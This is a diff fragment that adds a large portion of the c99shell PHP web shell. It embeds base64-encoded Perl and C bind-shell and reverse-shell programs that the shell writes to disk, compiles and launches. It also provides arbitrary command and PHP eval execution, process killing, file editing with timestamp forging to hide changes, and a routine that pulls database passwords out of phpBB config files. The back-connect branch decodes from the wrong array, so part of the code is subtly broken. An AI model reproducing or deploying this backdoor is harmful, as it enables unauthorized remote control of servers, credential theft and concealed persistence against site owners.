+  echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+
+ if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
+  if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
+  if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
+  if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "<b>Result of binding port:</b><br>";
+   $v = $bndportsrcs[$bind[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bind[src];
+    $w = explode(".",$bind[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind[port],$v[1]);
+     $v[1] = str_replace("%pass",$bind[pass],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5); //Timeout
+     $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+    }
+    echo "<br>";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "<b>Result of back connection:</b><br>";
+   $v = $bcsrcs[$bc[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bc[src];
+    $w = explode(".",$bc[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc[host],$v[1]);
+     $v[1] = str_replace("%port",$bc[port],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
+    }
+   }
+  }
+  ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php
+foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
+ }
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   myshellexec($cmd);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($cmd_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($cmd_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    myshellexec($cmd);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Processes:</b><br>";
+ if ($win) {echo "This function not work in Windows!<br><br>";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   $ret = str_replace("	"," ",$ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $prcs = explode("\n",$ret);
+   $head = explode(" ",$prcs[0]);
+   $head[] = "ACTION";
+   unset($prcs[0]);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   echo "<tr border=\"1\">";
+   foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+   echo "</tr>";
+   foreach ($prcs as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+     echo "</tr>";
+    }
+   }
+   echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+   if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+array("Code","code"),
+array("Session","phpsess"),
+array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+array("SDB","sdb"),
+array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+);
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+  echo "</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else
+   {
+    echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
+   }
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";      
+    $tmp=posix_getpwuid(fileowner($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+    else echo $tmp['name']." ";
+    $tmp=posix_getgrgid(filegroup($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+    else echo $tmp['name'];
+   }
+   echo "<tr class=tr><td><b>Perms</b></td><td>";
+   
+   if (is_writable($d.$f))
+   {
+    echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+   }
+   else
+   {
+    echo "<font>".view_perms(fileperms($d.$f))."</font>";
+   }
+
+   echo "</td></tr>";
+   echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><br>";
+
+
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump)
+    {
+     echo "<b>FULL HEXDUMP</b>";
+     $str=fread($fi,filesize($d.$f));
+    }
+    else
+    {
+     echo "<b>HEXDUMP PREVIEW</b>";
+     $str=fread($fi,$hexdump_lines*$hexdump_rows);
+    }
+    $n=0;
+    $a0="00000000<br>";
+    $a1="";
+    $a2="";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1.=sprintf("%02X",ord($str[$i])).' ';
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2.="<font class=s2>0</font>"; break;
+      case 32: 
+      case 10:
+      case 13: $a2.="&nbsp;"; break;
+      default:  $a2.=htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+      $a1.="<br>";
+      $a2.="<br>";
+     }
+    }
+    //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+         "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode($r);
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode($r));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode($r);
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+   <P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+   echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+   echo "<pre>";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+   echo "<pre>";
+   var_dump(unserialize(base64_decode($r)));
+   echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("
+",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array(
+     "dbms"=>$dbms,
+     "dbhost"=>$dbhost,
+     "dbname"=>$dbname,
+     "dbuser"=>$dbuser,
+     "dbpasswd"=>$dbpasswd 
+     );
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+     echo "</b>";
+     echo "<hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+   if (!empty($white)) {@ob_clean();}
+   if ($rehtml) {$r = rehtmlspecialchars($r);} 
+   $r = stripslashes($r); 
+   $strip = false;
+   if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+   $r = @highlight_string($r, TRUE); 
+   if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+   echo $r;
+   if (!empty($white)) {exit;}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: c99shell");
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   if (!$white)
+   {
+    echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: image/gif"); 
+    echo($r); 
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$nfcontent);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $nfcontent;
+    }
+   }
+   $rows = count(explode("
+",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
